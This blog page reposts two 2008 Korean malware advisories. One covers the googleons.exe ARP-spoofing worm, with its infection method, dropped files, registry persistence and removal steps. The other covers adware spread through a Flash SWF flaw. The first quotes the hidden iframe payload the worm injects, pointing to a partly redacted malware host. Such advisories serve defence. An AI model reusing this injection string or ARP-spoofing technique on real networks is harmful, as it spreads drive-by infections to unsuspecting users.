'CISSP/보안'에 해당되는 글 2건

  1. 2008.11.24 ARP Spoofing
  2. 2008.11.24 Adobe Flash Player 의 SWF 취약점을 이용해 배포되는 악성코드 주의
2008. 11. 24. 11:42

ARP Spoofing


1. 개요

(1)  최근 국내에서 ARP Spoofing을 통해 감염되고,

      감염 시 네트워크를 마비시키는 악성코드가 등장하여 주의가 필요함.
(2)  특히 네트워크 관리자는 내부 네트워크에서 ARP Spoofing 공격 여부를

      주기적으로 탐지하고 공격 근원지를 파악하여

      관련 악성코드가 실행 및 다운로드 되지 않도록 주의가 필요함.

 

 

 

2. 전파방법

(1)  최초 googleons.exe에 감염된 PC는 ARP Spoofing 공격

 -   해당 악성코드 감염시 네트워크에 존재하는 호스트 및 게이트웨이를 대상으로

      ARP Reply를 지속적으로 보냄.

 -   게이트웨이의 MAC 주소와 공격대상 호스트의 MAC 주소를 위조하는 ARP Reply를

      지속적으로 보냄.

(2)  감염된 PC와 동일 네트워크에 연결되어 있는 호스트들은

      감염된 PC를 게이트웨이로 인식하게 하여 모든 패킷을 모니터링 및 변조할 수 있음.

 -   ARP Spoofing 공격으로 정상 호스트가 웹 접속 시 감염 PC는 패킷을 가로채고

      아래와 같은 정보를 삽입해 악성코드 유포지 사이트로 유도.

      "<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe>"

(3)  악성코드 유포지 down.online[생략].net으로 유도된 PC중

      아래와 같은 윈도우 취약점 패치가 안된 사이트는 googleons.exe에 감염됨.

 -   MS05-025
 -   MS06-014
 -   MS07-017
 -   MS07-027

 

 

 

3. 악성행위 (googleons.exe)

(1)  감염 PC와 동일 네트워크 대역 ARP Spoofing 공격.

(2)  동일 네트워크에 존재하는 PC들의 HTTP 통신 패킷 변조.

      "<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe>

      </IFRAME P ?</IFRAME IFRAME " 삽입.

(3)  USB를 통한 악성코드 전파.

(4)  감염 PC에 존재하는 .html, tml, asp, php, jsp 확장자에 아래와 같은 악성코드 삽입.

      "<iframe src=http://down.online[생략].net/page/image/pd.htm height=0></iframe>

      </IFRAME P ?</IFRAME IFRAME "

(5)  감염시 생성되는 파일

 -    C:\Document and Settings\[계정]\Local Settings\Temp
       autoexec.bat (down.exe 최초 감염 악성코드, googleons.exe를 다운로드 및 실행)

       googleons.exe 
       disocoo.exe (실행뒤 삭제)
       npptools.dll
       Packet.dll
       WanPacket.dll
       yahoons.exe (실행뒤 삭제)

 -    C:\windows\system32 (yahoons.exe 실행에 의해 생성되는 파일들)
       dllhost32.exe
       mh104.dll
       moyu103.dll
       mosou.exe
       mydata.exe
       nwizwmgjs.exe
       nwizwmgjs.dll
       nwizzhuxians.exe
       nwizzhuxians.dll
       RAV00xx.exe등 다수

 

(6)  부팅 후 재시작 할 수 있는 레지스트리에 등록.

 -   HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 -   이름 : svc

 -   파일 이름 : googleons.exe

 

 

 

4. 감염여부 확인 및 치료방법

(1)  감염여부 확인
 -    L3 또는 라우터에서 감염 PC 확인.

      중복 MAC 주소 IP 확인 (악성코드 감염 IP 확인).

 

 -   ARP Spoofing 피해 PC에서 공격 PC 확인.

      전체 네트워크 Ping 스캔.

      중복 MAC 주소 IP 확인.

 

      

 

 -   악성코드 감염 및 ARP Spoofing 공격 PC 확인.

      C:\Document and Settings\[계정]\Local Settings\Temp\googleons.exe

      존재여부 확인

      googleons.exe 프로세스 실행여부 확인 [아래 치료방법 참조]

 

(2)  치료방법
 -   C:\Document and Settings\[계정]\Local Settings\Temp 하위 악성코드들 삭제.

 

     

 

 -   윈도우 시스템 폴더에 존재하는 악성코드들 삭제.

 

     

 

 -   googleons.exe 프로세스 끝내기.

      [Ctrl + Alt + Del] 클릭 후 프로세스 메뉴에서 googleons.exe 프로세스 종료.

 

     

 

 -   레지스트리 삭제.

 ①  googleons 재시작 레지스트리 삭제.

      [시작] → [실행] 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제.

      HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 ②  기타 악성코드 레지스트리 삭제.

      [시작] → [실행] 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제.

      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 

 

 

5. 예방 방법

(1)  감염을 위한 사전 예방 방법

 -    윈도 OS 최신 패치 실시.

 

     

 

 

 ※ 출처 : 인터넷 침해사고 대응지원센터

Trackback 0 Comment 0
2008. 11. 24. 10:40

Adobe Flash Player 의 SWF 취약점을 이용해 배포되는 악성코드 주의

◈ 제목
Adobe Flash Player
SWF 취약점을 이용해 배포되는 악성코드 주의

◈ 개요
V3
제품군에서 Win-Trojan/Exploit-SWF.Gen으로 진단되는 Adobe Flash Player SWF 취약점을 이용해 배포되는 악성코드로 인해 고객들의 피해 신고가 지속되고 있다.
해당 악성코드에 감염되면 Internet Explorer의 시작 페이지를 www.3929.cn으로 변경, 웹페이지 내에 광고 삽입, Internet Explorer 툴바 설치, 팝업광고를 노출하며 은폐를 위해 윈도우 정상 드라이버를 루트킷 드라이버로 교체한다.

◈ 공격유형
취약점을 이용해 배포되는 악성코드

◈ 영향
해당 악성코드에 감염되면 Internet Explorer의 시작 페이지를 www.3929.cn으로 변경, 웹페이지 내에 광고 삽입, Internet Explorer 툴바 설치, 팝업광고를 노출

◈ 설명

최근 인터넷 익스플로러의 시작 페이지를 www.3929.cn 으로 변경하는 악성코드 피해 신고가 많아지고 있다.
이것은 웹 페이지내에 광고를 삽입하고 툴바설치 및 팝업광고를 띄운다.
V3
제품군에서는 2008 11 20일부터 다음의 진단명으로 관련 악성코드를 진단하고 있으며 지속적으로 변형이 발견되고 있다.

Dropper/Autorun.172861
Win-Adware/Alexa.110592
Win-Adware/BHO.Cinmus.49152
Win-Adware/BHO.Cinmus.86016
Win-Adware/Cinmus.10852
Win-Adware/Cinmus.136452
Win-Adware/Cinmus.139115
Win-Adware/Cinmus.184320
Win-Adware/Cinmus.94247
Win-Adware/Cinmus.97792
Win-Dropper/Cinmus.148648
Win-Dropper/Cinmus.59974
Win-Dropper/Cinmus.64629
Win-Spyware/RootKit.2944.B
Win-Trojan/Agent.122880.EC
Win-Trojan/Agent.153257
Win-Trojan/Agent.16261
Win-Trojan/Agent.363520.P
Win-Trojan/Agent.45056.WH
Win-Trojan/Agent.69632.JH
Win-Trojan/Agent.7682
Win-Trojan/Downloader.200704.G
Win-Trojan/Downloader.217088.D
Win-Trojan/Downloader.45056.JS
Win-Trojan/Downloader.57344.FC
Win-Trojan/Keylogger.181248
Win-Trojan/OnlineGameHack.115712.AQ
Win-Trojan/OnlineGameHack.155330
Win-Trojan/OnlineGameHack.28672.PJ
Win-Trojan/OnlineGameHack.32768.HR
Win-Trojan/OnlineGameHack.59904.U
Win-Trojan/OnlineGameHack.62464.N
Win-Trojan/OnlineGameHack.86016.CW
Win-Trojan/Rootkit.29440

Adobe Flash Player
SWF 보안 취약점을 패치하지 않고 V3와 같은 컴퓨터 보안 프로그램의 실시간 감시 기능을 사용하지 않거나 최신 버전의 엔진을 사용하지 않아 이런 문제가 확산된 것으로 보인다.
따라서 해당 악성코드로 인한 피해를 예방하기 위해서는 Adobe Flash Player SWF 보안 취약점이 해결된 최신 버전으로 업데이트를 해야 하며, V3와 같은 컴퓨터 보안 프로그램을 항상 최신 버전의 엔진으로 유지하며 실시간 감시를 활성화 시켜 놓아야 한다.

이미 감염 피해를 당한 고객은 최신 버전으로 V3를 업데이트 실시 후 수동 검사를 수행하고 아래의 웹사이트를 방문하여 전용백신을 이용한 치료를 수행하여 치료할 것을 권고한다.

전용백신 다운로드 페이지
- http://kr.ahnlab.com/dwVaccineView.ahn?num=79&cPage=1


Trackback 0 Comment 0